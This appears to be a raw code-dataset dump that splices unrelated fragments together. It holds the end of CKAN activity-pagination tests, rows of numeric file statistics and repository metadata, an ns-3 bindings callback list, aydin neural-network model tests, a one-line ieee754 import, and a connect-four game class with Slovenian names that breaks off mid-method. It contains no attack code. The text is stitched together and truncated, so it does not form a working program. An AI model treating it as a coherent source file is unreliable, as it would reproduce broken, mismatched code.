url = url_for("activity.package_activity", id=dataset["id"])
response = app.get(url)
activities = helpers.call_action(
"package_activity_list", id=dataset["id"]
)
# Last activity in the first page
before_time = datetime.fromisoformat(activities[2]["timestamp"])
# Next page button
next_page_url = "/dataset/activity/{}?before={}".format(
dataset["id"], before_time.timestamp()
)
assert next_page_url in response.body
# Prev page button is not in the first page
prev_page_url = "/dataset/activity/{}?after=".format(dataset["id"])
assert prev_page_url not in response.body
@pytest.mark.ckan_config("ckan.activity_list_limit", "3")
def test_next_before_buttons(self, app):
user = factories.User()
dataset = factories.Dataset(user=user)
dataset["title"] = "Second title"
helpers.call_action("package_update", **dataset)
dataset["title"] = "Third title"
helpers.call_action("package_update", **dataset)
dataset["title"] = "4th title"
helpers.call_action("package_update", **dataset)
dataset["title"] = "5th title"
helpers.call_action("package_update", **dataset)
dataset["title"] = "6th title"
helpers.call_action("package_update", **dataset)
dataset["title"] = "7h title"
helpers.call_action("package_update", **dataset)
db_activities = activity_model.package_activity_list(
dataset["id"], limit=10
)
activities = helpers.call_action(
"package_activity_list", id=dataset["id"]
)
# Last activity in the first page
last_act_page_1_time = datetime.fromisoformat(
activities[2]["timestamp"]
)
url = url_for("activity.package_activity", id=dataset["id"])
response = app.get(
url, query_string={"before": last_act_page_1_time.timestamp()}
)
# Next page button exists in page 2
next_page_url = "/dataset/activity/{}?before={}".format(
dataset["id"], db_activities[5].timestamp.timestamp()
)
assert next_page_url in response.body
# Prev page button exists in page 2
prev_page_url = "/dataset/activity/{}?after={}".format(
dataset["id"], db_activities[3].timestamp.timestamp()
)
assert prev_page_url in response.body
@pytest.mark.ckan_config("ckan.activity_list_limit", "3")
def test_prev_page_button(self, app):
user = factories.User()
dataset = factories.Dataset(user=user)
dataset["title"] = "Second title"
helpers.call_action("package_update", **dataset)
dataset["title"] = "Third title"
helpers.call_action("package_update", **dataset)
dataset["title"] = "Fourth title"
helpers.call_action("package_update", **dataset)
activities = helpers.call_action(
"package_activity_list", id=dataset["id"], limit=10
)
before_time = datetime.fromisoformat(activities[2]["timestamp"])
url = url_for("activity.package_activity", id=dataset["id"])
# url for page 2
response = app.get(
url, query_string={"before": before_time.timestamp()}
)
# There's not a third page
next_page_url = "/dataset/activity/{}?before=".format(dataset["name"])
assert next_page_url not in response.body
# previous page exists
after_time = datetime.fromisoformat(activities[3]["timestamp"])
prev_page_url = "/dataset/activity/{}?after={}".format(
dataset["id"], after_time.timestamp()
)
assert prev_page_url in response.body
@pytest.mark.ckan_config("ckan.plugins", "activity")
@pytest.mark.usefixtures("non_clean_db", "with_plugins")
class TestGroup:
def test_simple(self, app):
"""Checking the template shows the activity stream."""
user = factories.User()
group = factories.Group(user=user)
url = url_for("activity.group_activity", id=group["id"])
response = app.get(url)
assert user["fullname"] in response
assert "created the group" in response
def test_create_group(self, app):
user = factories.User()
group = factories.Group(user=user)
url = url_for("activity.group_activity", id=group["id"])
response = app.get(url)
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "created the group" in response
assert (
'<a href="/group/{}">{}'.format(group["name"], group["title"])
in response
)
def test_change_group(self, app):
user = factories.User()
group = factories.Group(user=user)
_clear_activities()
group["title"] = "Group with changed title"
helpers.call_action(
"group_update", context={"user": user["name"]}, **group
)
url = url_for("activity.group_activity", id=group["id"])
response = app.get(url)
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "updated the group" in response
assert (
'<a href="/group/{}">{}'.format(group["name"], group["title"])
in response
)
def test_delete_group_using_group_delete(self, app):
user = factories.User()
group = factories.Group(user=user)
_clear_activities()
helpers.call_action(
"group_delete", context={"user": user["name"]}, **group
)
url = url_for("activity.group_activity", id=group["id"])
env = {"REMOTE_USER": user["name"]}
app.get(url, extra_environ=env, status=404)
# group_delete causes the Member to state=deleted and then the user
# doesn't have permission to see their own deleted Group. Therefore you
# can't render the activity stream of that group. You'd hope that
# group_delete was the same as group_update state=deleted but they are
# not...
def test_delete_group_by_updating_state(self, app):
user = factories.User()
group = factories.Group(user=user)
_clear_activities()
group["state"] = "deleted"
helpers.call_action(
"group_update", context={"user": user["name"]}, **group
)
url = url_for("activity.group_activity", id=group["id"])
env = {"REMOTE_USER": user["name"]}
response = app.get(url, extra_environ=env)
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "deleted the group" in response
assert (
'<a href="/group/{}">{}'.format(group["name"], group["title"])
in response
)
def test_create_dataset(self, app):
user = factories.User()
group = factories.Group(user=user)
_clear_activities()
dataset = factories.Dataset(groups=[{"id": group["id"]}], user=user)
url = url_for("activity.group_activity", id=group["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".dataset")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "created the dataset" in response
assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert dataset["title"] in href.text.strip()
def test_change_dataset(self, app):
user = factories.User()
group = factories.Group(user=user)
dataset = factories.Dataset(groups=[{"id": group["id"]}], user=user)
_clear_activities()
dataset["title"] = "Dataset with changed title"
helpers.call_action(
"package_update", context={"user": user["name"]}, **dataset
)
url = url_for("activity.group_activity", id=group["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".dataset")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "updated the dataset" in response
assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert dataset["title"] in href.text.strip()
def test_delete_dataset(self, app):
user = factories.User()
group = factories.Group(user=user)
dataset = factories.Dataset(groups=[{"id": group["id"]}], user=user)
_clear_activities()
helpers.call_action(
"package_delete", context={"user": user["name"]}, **dataset
)
url = url_for("activity.group_activity", id=group["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".dataset")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "deleted the dataset" in response
assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert dataset["title"] in href.text.strip()
| 36.191107
| 146
| 0.583991
| 4,306
| 38,254
| 5.046679
| 0.065722
| 0.039575
| 0.044177
| 0.035203
| 0.859555
| 0.841793
| 0.83443
| 0.820487
| 0.799273
| 0.771064
| 0
| 0.005509
| 0.274037
| 38,254
| 1,056
| 147
| 36.225379
| 0.776998
| 0.060438
| 0
| 0.740957
| 0
| 0
| 0.176112
| 0.050146
| 0
| 0
| 0
| 0
| 0.157526
| 1
| 0.057176
| false
| 0
| 0.011669
| 0
| 0.073512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
941c220f14cc4e46420d6820a5146f5600ad42e2
| 176
|
py
|
Python
|
ns-allinone-3.27/ns-3.27/src/config-store/bindings/callbacks_list.py
|
zack-braun/4607_NS
|
43c8fb772e5552fb44bd7cd34173e73e3fb66537
|
[
"MIT"
] | 93
|
2019-04-21T08:22:26.000Z
|
2022-03-30T04:26:29.000Z
|
ns-allinone-3.27/ns-3.27/src/config-store/bindings/callbacks_list.py
|
zack-braun/4607_NS
|
43c8fb772e5552fb44bd7cd34173e73e3fb66537
|
[
"MIT"
] | 12
|
2019-04-19T16:39:58.000Z
|
2021-06-22T13:18:32.000Z
|
ns-allinone-3.27/ns-3.27/src/config-store/bindings/callbacks_list.py
|
zack-braun/4607_NS
|
43c8fb772e5552fb44bd7cd34173e73e3fb66537
|
[
"MIT"
] | 21
|
2019-05-27T19:36:12.000Z
|
2021-07-26T02:37:41.000Z
|
callback_classes = [
['ns3::ObjectBase *', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
]
| 44
| 152
| 0.573864
| 22
| 176
| 4.545455
| 0.227273
| 0.72
| 0.88
| 1.28
| 0.72
| 0.72
| 0.72
| 0.72
| 0.72
| 0.72
| 0
| 0.063694
| 0.107955
| 176
| 3
| 153
| 58.666667
| 0.573248
| 0
| 0
| 0
| 0
| 0
| 0.607955
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
948948f20d45fbd31116314e59738d8968477193
| 3,738
|
py
|
Python
|
aydin/nn/models/test/test_models.py
|
royerloic/aydin
|
f9c61a24030891d008c318b250da5faec69fcd7d
|
[
"BSD-3-Clause"
] | 78
|
2021-11-08T16:11:23.000Z
|
2022-03-27T17:51:04.000Z
|
aydin/nn/models/test/test_models.py
|
royerloic/aydin
|
f9c61a24030891d008c318b250da5faec69fcd7d
|
[
"BSD-3-Clause"
] | 19
|
2021-11-08T17:15:40.000Z
|
2022-03-30T17:46:55.000Z
|
aydin/nn/models/test/test_models.py
|
royerloic/aydin
|
f9c61a24030891d008c318b250da5faec69fcd7d
|
[
"BSD-3-Clause"
] | 7
|
2021-11-09T17:42:32.000Z
|
2022-03-09T00:37:57.000Z
|
import numpy as np
from aydin.nn.models.jinet import JINetModel
from aydin.nn.models.unet import UNetModel
def test_supervised_2D():
input_array = np.zeros((1, 64, 64, 1), dtype=np.float32)
model2d = UNetModel(
(64, 64, 1),
nb_unet_levels=2,
shiftconv=False,
supervised=True,
spacetime_ndim=2,
)
result = model2d.predict(input_array)
assert result.shape == input_array.shape
assert result.dtype == input_array.dtype
def test_shiftconv_2D():
input_array = np.zeros((1, 64, 64, 1), dtype=np.float32)
model2d = UNetModel(
(64, 64, 1),
nb_unet_levels=2,
shiftconv=True,
supervised=False,
spacetime_ndim=2,
)
result = model2d.predict(input_array)
assert result.shape == input_array.shape
assert result.dtype == input_array.dtype
def test_masking_2D():
input_array = np.zeros((1, 64, 64, 1), dtype=np.float32)
model2d = UNetModel(
(64, 64, 1),
nb_unet_levels=2,
shiftconv=False,
supervised=False,
spacetime_ndim=2,
)
result = model2d.predict([input_array, input_array])
assert result.shape == input_array.shape
assert result.dtype == input_array.dtype
def test_jinet_2D():
input_array = np.zeros((1, 64, 64, 1), dtype=np.float32)
model2d = JINetModel((64, 64, 1), spacetime_ndim=2)
result = model2d.predict([input_array])
assert result.shape == input_array.shape
assert result.dtype == input_array.dtype
def test_supervised_3D():
input_array = np.zeros((1, 64, 64, 64, 1), dtype=np.float32)
model3d = UNetModel(
(64, 64, 64, 1),
nb_unet_levels=2,
shiftconv=False,
supervised=True,
spacetime_ndim=3,
)
result = model3d.predict(input_array)
assert result.shape == input_array.shape
assert result.dtype == input_array.dtype
def test_shiftconv_3D():
input_array = np.zeros((1, 64, 64, 64, 1), dtype=np.float32)
model3d = UNetModel(
(64, 64, 64, 1),
nb_unet_levels=2,
shiftconv=True,
supervised=False,
spacetime_ndim=3,
)
result = model3d.predict(input_array)
assert result.shape == input_array.shape
assert result.dtype == input_array.dtype
def test_masking_3D():
input_array = np.zeros((1, 64, 64, 64, 1), dtype=np.float32)
model3d = UNetModel(
(64, 64, 64, 1),
nb_unet_levels=2,
shiftconv=False,
supervised=False,
spacetime_ndim=3,
)
result = model3d.predict([input_array, input_array])
assert result.shape == input_array.shape
assert result.dtype == input_array.dtype
def test_various_masking_3D():
for i in [0, 4]:
input_array = np.zeros((1, 21 + i, 64, 64, 1), dtype=np.float32)
print(f'input shape: {input_array.shape}')
model3d = UNetModel(
input_array.shape[1:],
nb_unet_levels=4,
shiftconv=False,
supervised=False,
spacetime_ndim=3,
)
result = model3d.predict([input_array, input_array])
assert result.shape == input_array.shape
assert result.dtype == input_array.dtype
def test_thin_masking_3D():
for i in range(3):
input_array = np.zeros((1, 2 + i, 64, 64, 1), dtype=np.float32)
print(f'input shape: {input_array.shape}')
model3d = UNetModel(
input_array.shape[1:],
nb_unet_levels=4,
shiftconv=False,
supervised=False,
spacetime_ndim=3,
)
result = model3d.predict([input_array, input_array])
assert result.shape == input_array.shape
assert result.dtype == input_array.dtype
| 28.976744
| 72
| 0.62306
| 488
| 3,738
| 4.590164
| 0.104508
| 0.196429
| 0.035714
| 0.098214
| 0.929464
| 0.9
| 0.9
| 0.9
| 0.9
| 0.9
| 0
| 0.061912
| 0.261102
| 3,738
| 128
| 73
| 29.203125
| 0.749095
| 0
| 0
| 0.752294
| 0
| 0
| 0.017121
| 0
| 0
| 0
| 0
| 0
| 0.165138
| 1
| 0.082569
| false
| 0
| 0.027523
| 0
| 0.110092
| 0.018349
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
84a6d27e19583749b2f3ac515409612cdffa0a49
| 35
|
py
|
Python
|
ieee754/__init__.py
|
canbula/ieee754
|
3311c8a8a44a521addbcd0c1cc39432edb2e94e5
|
[
"MIT"
] | 2
|
2022-01-08T16:28:12.000Z
|
2022-01-08T20:57:48.000Z
|
ieee754/__init__.py
|
canbula/ieee754
|
3311c8a8a44a521addbcd0c1cc39432edb2e94e5
|
[
"MIT"
] | null | null | null |
ieee754/__init__.py
|
canbula/ieee754
|
3311c8a8a44a521addbcd0c1cc39432edb2e94e5
|
[
"MIT"
] | null | null | null |
from ieee754.IEEE754 import IEEE754
| 35
| 35
| 0.885714
| 5
| 35
| 6.2
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.28125
| 0.085714
| 35
| 1
| 35
| 35
| 0.6875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
84a99d1371d9695c1dd8444857c85c72a14c0223
| 41,094
|
py
|
Python
|
model.py
|
LovroPridigar/Vislice
|
6e3e01b95cc15755ac1365a084c0743f6df1571d
|
[
"MIT"
] | null | null | null |
model.py
|
LovroPridigar/Vislice
|
6e3e01b95cc15755ac1365a084c0743f6df1571d
|
[
"MIT"
] | null | null | null |
model.py
|
LovroPridigar/Vislice
|
6e3e01b95cc15755ac1365a084c0743f6df1571d
|
[
"MIT"
] | null | null | null |
import random
import time
SIRINA = 7
VISINA = 6
def nova_igra():
seznam = []
for i in range(VISINA):
seznam.append([])
for j in range(SIRINA):
seznam[i].append(" ")
return Polje(seznam)
class Polje:
def __init__(self, polje):
self.polje = polje[:]
self.meti = []
self.score1 = 0
self.score2 = 0
def pravilnost(self, izbira):
if self.polje[VISINA - 1][izbira] == " ":
return True
else:
return False
def dodaj_kovanec_X(self, izbira):
self.meti.append(izbira)
if self.pravilnost(izbira) == True:
for i in range(VISINA):
if self.polje[i][izbira] == " ":
self.polje[i].pop(izbira)
self.polje[i].insert(izbira, "X")
break
def dodaj_kovanec_O(self, izbira):
self.meti.append(izbira)
if self.pravilnost(izbira) == True:
for i in range(VISINA):
if self.polje[i][izbira] == " ":
self.polje[i].pop(izbira)
self.polje[i].insert(izbira, "O")
break
def get_visina(self, izbira):
visina = 0
for i in range(VISINA):
if self.polje[i][izbira] == " ":
visina += 1
return 6 - visina
def odstrani_kovanec(self, izbira):
stevilo = 0
for i in range(VISINA):
if self.polje[i][izbira] == " ":
stevilo += 1
if stevilo != 6:
self.polje[5 - stevilo].pop(izbira)
self.polje[5 - stevilo].insert(izbira, " ")
def seznam_pravilnih(self):
seznam = []
for i in range(SIRINA):
if self.polje[VISINA - 1][i] == " ":
seznam.append(i)
return seznam
def sprintaj(self):
polje = []
for i in range(len(self.polje)):
polje.append("│ " + " │ ".join(str(v) for v in self.polje[i]) + " │")
polje.insert(0, "│ 0 │ 1 │ 2 │ 3 │ 4 │ 5 │ 6 │")
polje.insert(1, "=============================")
novo_polje = []
for i in range(len(polje)):
novo_polje.append(polje[-i-1])
print(*novo_polje, sep = "\n")
def animacija(self, izbira):
if self.zmaga() == True:
if self.get_visina(izbira) <= 4:
time.sleep(1.6)
self.odstrani_kovanec(izbira)
for i in range(1, 6 - self.get_visina(izbira)):
self.polje[-i][izbira] = "o"
print("_____________________________")
self.sprintaj()
time.sleep(1.1)
self.polje[-i][izbira] = " "
self.dodaj_kovanec_O(izbira)
def remi(self):
if self.seznam_pravilnih() == [] and self.zmaga() == False:
return True
else:
return False
def stevilo_kovancev(self):
stevilo = 0
for vrstica in self.polje:
for element in vrstica:
if element == "X" or element == "O":
stevilo += 1
return stevilo
def kdo_je_zmagal(self):
if self.remi() == True:
return "Igra je neodločena!"
if True:
if self.stevilo_kovancev() % 2 == 1:
return "Zmagal je Igralec 1 !"
else:
return "Zmagal je Igralec 2 !"
def kdo_je_zmagal_robot(self):
if self.stevilo_kovancev() % 2 == 1:
return "Igralec 1"
else:
return "ROBOT"
def sprazni_polje(self):
for vrstica in self.polje:
for i in range(len(vrstica)):
vrstica.pop(i)
vrstica.insert(i, " ")
return self.polje
def kdo_je_na_vrsti(self):
if self.stevilo_kovancev() % 2 == 0:
return "Igralec 1"
else:
return "Igralec 2"
def shiny(self):
if self.zmaga() == True:
for i in range(6):
for j in range(4):
if (self.polje[i][j] == "O" and self.polje[i][j + 1] == "O" and self.polje[i][j + 2] == "O" and self.polje[i][j + 3] == "O"):
self.polje[i][j] = "o"
self.polje[i][j + 1] = "o"
self.polje[i][j + 2] = "o"
self.polje[i][j + 3] = "o"
for i in range(3):
for j in range(7):
if (self.polje[i][j] == "O" and self.polje[i + 1][j] == "O" and self.polje[i + 2][j] == "O" and self.polje[i + 3][j] == "O"):
self.polje[i][j] = "o"
self.polje[i + 1][j] = "o"
self.polje[i + 2][j] = "o"
self.polje[i + 3][j] = "o"
for i in range(3):
for j in range(4):
if (self.polje[i][j] == "O" and self.polje[i + 1][j + 1] == "O" and self.polje[i + 2][j + 2] == "O" and self.polje[i + 3][j + 3] == "O"):
self.polje[i][j] = "o"
self.polje[i + 1][j + 1] = "o"
self.polje[i + 2][j + 2] = "o"
self.polje[i + 3][j + 3] = "o"
for i in range(3, 5):
for j in range(4):
if (self.polje[i][j] == "O" and self.polje[i - 1][j + 1] == "O" and self.polje[i - 2][j + 2] == "O" and self.polje[i - 3][j + 3] == "O"):
self.polje[i][j] = "o"
self.polje[i - 1][j + 1] = "o"
self.polje[i - 2][j + 2] = "o"
self.polje[i - 3][j + 3] = "o"
for i in range(6):
for j in range(4):
if (self.polje[i][j] == "X" and self.polje[i][j + 1] == "X" and self.polje[i][j + 2] == "X" and self.polje[i][j + 3] == "X"):
self.polje[i][j] = "x"
self.polje[i][j + 1] = "x"
self.polje[i][j + 2] = "x"
self.polje[i][j + 3] = "x"
for i in range(3):
for j in range(7):
if (self.polje[i][j] == "X" and self.polje[i + 1][j] == "X" and self.polje[i + 2][j] == "X" and self.polje[i + 3][j] == "X"):
self.polje[i][j] = "x"
self.polje[i + 1][j] = "x"
self.polje[i + 2][j] = "x"
self.polje[i + 3][j] = "x"
for i in range(3):
for j in range(4):
if (self.polje[i][j] == "X" and self.polje[i + 1][j + 1] == "X" and self.polje[i + 2][j + 2] == "X" and self.polje[i + 3][j + 3] == "X"):
self.polje[i][j] = "x"
self.polje[i + 1][j + 1] = "x"
self.polje[i + 2][j + 2] = "x"
self.polje[i + 3][j + 3] = "x"
for i in range(3, 5):
for j in range(4):
if (self.polje[i][j] == "X" and self.polje[i - 1][j + 1] == "X" and self.polje[i - 2][j + 2] == "X" and self.polje[i - 3][j + 3] == "X"):
self.polje[i][j] = "x"
self.polje[i - 1][j + 1] = "x"
self.polje[i - 2][j + 2] = "x"
self.polje[i - 3][j + 3] = "x"
######################################################################################################################################################################
def vodoravno_4(self):
for i in range(6):
for j in range(4):
if (self.polje[i][j] == "O" and self.polje[i][j + 1] == "O" and self.polje[i][j + 2] == "O" and self.polje[i][j + 3] == "O") or (self.polje[i][j] == "X" and self.polje[i][j + 1] == "X" and self.polje[i][j + 2] == "X" and self.polje[i][j + 3] == "X"):
return True
def navpicno_4(self):
for i in range(3):
for j in range(7):
if (self.polje[i][j] == "O" and self.polje[i + 1][j] == "O" and self.polje[i + 2][j] == "O" and self.polje[i + 3][j] == "O") or (self.polje[i][j] == "X" and self.polje[i + 1][j] == "X" and self.polje[i + 2][j] == "X" and self.polje[i + 3][j] == "X"):
return True
def posevno_4(self):
for i in range(3):
for j in range(4):
if (self.polje[i][j] == "O" and self.polje[i + 1][j + 1] == "O" and self.polje[i + 2][j + 2] == "O" and self.polje[i + 3][j + 3] == "O") or (self.polje[i][j] == "X" and self.polje[i + 1][j + 1] == "X" and self.polje[i + 2][j + 2] == "X" and self.polje[i + 3][j + 3] == "X"):
return True
def posevno2_4(self):
for i in range(3, 5):
for j in range(4):
if (self.polje[i][j] == "O" and self.polje[i - 1][j + 1] == "O" and self.polje[i - 2][j + 2] == "O" and self.polje[i - 3][j + 3] == "O") or (self.polje[i][j] == "X" and self.polje[i - 1][j + 1] == "X" and self.polje[i - 2][j + 2] == "X" and self.polje[i - 3][j + 3] == "X"):
return True
def zmaga(self):
if self.vodoravno_4() or self.navpicno_4() or self.posevno_4() or self.posevno2_4() == True:
return True
else:
return False
def st_zmag(self):
stevilo = 0
if self.vodoravno_4() or self.navpicno_4() or self.posevno_4() or self.posevno2_4() == True:
stevilo += 1
return stevilo
def zmaga_brez_navp(self):
if self.vodoravno_4() or self.posevno_4() or self.posevno2_4() == True:
return True
else:
return False
def vodoravno_4_o(self):
for i in range(6):
for j in range(4):
if (self.polje[i][j] == "o" and self.polje[i][j + 1] == "o" and self.polje[i][j + 2] == "o" and self.polje[i][j + 3] == "o"):
return True
def navpicno_4_o(self):
for i in range(3):
for j in range(7):
if (self.polje[i][j] == "o" and self.polje[i + 1][j] == "o" and self.polje[i + 2][j] == "o" and self.polje[i + 3][j] == "o"):
return True
def posevno_4_o(self):
for i in range(3):
for j in range(4):
if (self.polje[i][j] == "o" and self.polje[i + 1][j + 1] == "o" and self.polje[i + 2][j + 2] == "o" and self.polje[i + 3][j + 3] == "o"):
return True
def posevno2_4_o(self):
for i in range(3, 5):
for j in range(4):
if (self.polje[i][j] == "o" and self.polje[i - 1][j + 1] == "o" and self.polje[i - 2][j + 2] == "o" and self.polje[i - 3][j + 3] == "o"):
return True
def zmaga_o(self):
if self.vodoravno_4_o() or self.navpicno_4_o() or self.posevno_4_o() or self.posevno2_4_o() == True:
return True
else:
return False
def vodoravno_4_x(self):
for i in range(6):
for j in range(4):
if (self.polje[i][j] == "x" and self.polje[i][j + 1] == "x" and self.polje[i][j + 2] == "x" and self.polje[i][j + 3] == "x"):
return True
def navpicno_4_x(self):
for i in range(3):
for j in range(7):
if (self.polje[i][j] == "x" and self.polje[i + 1][j] == "x" and self.polje[i + 2][j] == "x" and self.polje[i + 3][j] == "x"):
return True
def posevno_4_x(self):
for i in range(3):
for j in range(4):
if (self.polje[i][j] == "x" and self.polje[i + 1][j + 1] == "x" and self.polje[i + 2][j + 2] == "x" and self.polje[i + 3][j + 3] == "x"):
return True
def posevno2_4_x(self):
for i in range(3, 5):
for j in range(4):
if (self.polje[i][j] == "x" and self.polje[i - 1][j + 1] == "x" and self.polje[i - 2][j + 2] == "x" and self.polje[i - 3][j + 3] == "x"):
return True
def zmaga_x(self):
if self.vodoravno_4_x() or self.navpicno_4_x() or self.posevno_4_x() or self.posevno2_4_x() == True:
return True
else:
return False
######################################################################################################################################################################
def vodoravno_4_0(self):
for i in range(6):
for j in range(4):
if (self.polje[i][j] == "O" and self.polje[i][j + 1] == "O" and self.polje[i][j + 2] == "O" and self.polje[i][j + 3] == "O"):
return True
def navpicno_4_0(self):
for i in range(3):
for j in range(7):
if (self.polje[i][j] == "O" and self.polje[i + 1][j] == "O" and self.polje[i + 2][j] == "O" and self.polje[i + 3][j] == "O"):
return True
def posevno_4_0(self):
for i in range(3):
for j in range(4):
if (self.polje[i][j] == "O" and self.polje[i + 1][j + 1] == "O" and self.polje[i + 2][j + 2] == "O" and self.polje[i + 3][j + 3] == "O"):
return True
def posevno2_4_0(self):
for i in range(3, 5):
for j in range(4):
if (self.polje[i][j] == "O" and self.polje[i - 1][j + 1] == "O" and self.polje[i - 2][j + 2] == "O" and self.polje[i - 3][j + 3] == "O"):
return True
def zmaga_0(self):
if self.vodoravno_4_0() or self.posevno2_4_0() or self.posevno_4_0() == True:
return True
else:
return False
######################################################################################################################################################################
def vodoravno_3(self):
stevilo = 0
for i in range(6):
for j in range(5):
if self.polje[i][j] == "O" and self.polje[i][j + 1] == "O" and self.polje[i][j + 2] == "O":
stevilo += 1
return stevilo
def navpicno_3(self):
stevilo = 0
for i in range(4):
for j in range(7):
if self.polje[i][j] == "O" and self.polje[i + 1][j] == "O" and self.polje[i + 2][j] == "O":
stevilo += 1
return stevilo
def posevno_3(self):
stevilo = 0
for i in range(4):
for j in range(5):
if self.polje[i][j] == "O" and self.polje[i + 1][j + 1] == "O" and self.polje[i + 2][j + 2] == "O":
stevilo += 1
return stevilo
def posevno2_3(self):
stevilo = 0
for i in range(2, 5):
for j in range(5):
if self.polje[i][j] == "O" and self.polje[i - 1][j + 1] == "O" and self.polje[i - 2][j + 2] == "O":
stevilo += 1
return stevilo
######################################################################################################################################################################
def vodoravno_2_0(self):
stevilo = 0
for i in range(6):
for j in range(5):
if self.polje[i][j] == "O" and self.polje[i][j + 1] == "O":
stevilo += 1
return stevilo
def navpicno_2_0(self):
stevilo = 0
for i in range(5):
for j in range(7):
if self.polje[i][j] == "O" and self.polje[i + 1][j] == "O":
stevilo += 1
return stevilo
def posevno_2_0(self):
stevilo = 0
for i in range(5):
for j in range(6):
if self.polje[i][j] == "O" and self.polje[i + 1][j + 1] == "O":
stevilo += 1
return stevilo
def posevno2_2_0(self):
stevilo = 0
for i in range(1, 5):
for j in range(6):
if self.polje[i][j] == "O" and self.polje[i - 1][j + 1] == "O":
stevilo += 1
return stevilo
######################################################################################################################################################################
def blokada_zmage_vodoravno(self):
stevilo = 0
for i in range(6):
for j in range(4):
if (self.polje[i][j] == "X" and self.polje[i][j + 1] == "X" and self.polje[i][j + 2] == "X" and self.polje[i][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "X" and self.polje[i][j + 1] == "X" and self.polje[i][j + 2] == "O" and self.polje[i][j + 3] == "X"):
stevilo += 1
if (self.polje[i][j] == "X" and self.polje[i][j + 1] == "O" and self.polje[i][j + 2] == "X" and self.polje[i][j + 3] == "X"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i][j + 1] == "X" and self.polje[i][j + 2] == "X" and self.polje[i][j + 3] == "X"):
stevilo += 1
return stevilo
def blokada_zmage_navpicno(self):
stevilo = 0
for i in range(3):
for j in range(7):
if (self.polje[i][j] == "O" and self.polje[i + 1][j] == "X" and self.polje[i + 2][j] == "X" and self.polje[i + 3][j] == "X"):
stevilo += 1
if (self.polje[i][j] == "X" and self.polje[i + 1][j] == "O" and self.polje[i + 2][j] == "X" and self.polje[i + 3][j] == "X"):
stevilo += 1
if (self.polje[i][j] == "X" and self.polje[i + 1][j] == "X" and self.polje[i + 2][j] == "O" and self.polje[i + 3][j] == "X"):
stevilo += 1
if ( self.polje[i][j] == "X" and self.polje[i + 1][j] == "X" and self.polje[i + 2][j] == "X" and self.polje[i + 3][j] == "O"):
stevilo += 1
return stevilo
def blokada_zmage_posevno(self):
stevilo = 0
for i in range(3):
for j in range(4):
if (self.polje[i][j] == "O" and self.polje[i + 1][j + 1] == "X" and self.polje[i + 2][j + 2] == "X" and self.polje[i + 3][j + 3] == "X"):
stevilo += 1
if (self.polje[i][j] == "X" and self.polje[i + 1][j + 1] == "O" and self.polje[i + 2][j + 2] == "X" and self.polje[i + 3][j + 3] == "X"):
stevilo += 1
if (self.polje[i][j] == "X" and self.polje[i + 1][j + 1] == "X" and self.polje[i + 2][j + 2] == "O" and self.polje[i + 3][j + 3] == "X"):
stevilo += 1
if (self.polje[i][j] == "X" and self.polje[i + 1][j + 1] == "X" and self.polje[i + 2][j + 2] == "X" and self.polje[i + 3][j + 3] == "O"):
stevilo += 1
return stevilo
def blokada_zmaga_posevno2(self):
stevilo = 0
for i in range(3, 5):
for j in range(4):
if (self.polje[i][j] == "O" and self.polje[i - 1][j + 1] == "X" and self.polje[i - 2][j + 2] == "X" and self.polje[i - 3][j + 3] == "X"):
stevilo += 1
if (self.polje[i][j] == "X" and self.polje[i - 1][j + 1] == "O" and self.polje[i - 2][j + 2] == "X" and self.polje[i - 3][j + 3] == "X"):
stevilo += 1
if (self.polje[i][j] == "X" and self.polje[i - 1][j + 1] == "X" and self.polje[i - 2][j + 2] == "O" and self.polje[i - 3][j + 3] == "X"):
stevilo += 1
if (self.polje[i][j] == "X" and self.polje[i - 1][j + 1] == "X" and self.polje[i - 2][j + 2] == "X" and self.polje[i - 3][j + 3] == "O"):
stevilo += 1
return stevilo
######################################################################################################################################################################
def blokada_zmage_vodoravno_O(self):
stevilo = 0
